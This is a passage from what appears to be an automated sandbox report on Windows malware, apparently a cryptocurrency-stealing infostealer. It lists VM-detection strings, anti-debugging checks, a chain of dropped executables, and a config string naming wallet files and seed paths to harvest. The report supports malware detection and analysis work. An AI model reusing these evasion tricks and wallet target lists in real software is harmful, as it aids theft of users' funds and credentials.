Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0244247334.exe, 0000000E.00000002.3055852446.00000000018F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: GHCGDAFC.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Code function: 7_2_04BF0CB7 rdtsc 7_2_04BF0CB7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C5B5FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5BC410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0067643B mov eax, dword ptr fs:[00000030h] 13_2_0067643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0067A1A2 mov eax, dword ptr fs:[00000030h] 13_2_0067A1A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C58B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C58B1F7
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\DAFHIDGIJK.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe"
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe "C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe "C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe"
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: 06f6d9547f.exe, 0000000F.00000000.2760041133.0000000000762000.00000002.00000001.01000000.0000000F.sdmp, 06f6d9547f.exe.13.dr, random[1].exe0.13.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CFBAKEHIEB.exe, CFBAKEHIEB.exe, 00000007.00000002.2503519634.0000000000569000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: xProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B341 cpuid 0_2_6C58B341
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5535A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5535A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00646590 LookupAccountNameA, 13_2_00646590
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 12.2.explorti.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorti.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CFBAKEHIEB.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.2463090610.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2536047263.0000000000641000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3240531583.0000000000641000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2675197163.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2503437125.0000000000371000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2491110423.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2531523803.0000000000641000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2495081397.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.0244247334.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2449562218.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3054902462.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3055852446.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0244247334.exe PID: 4320, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 9C680Q69ers\user\AppData\Roaming\Electrum-LTC\wallets\*.**O
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 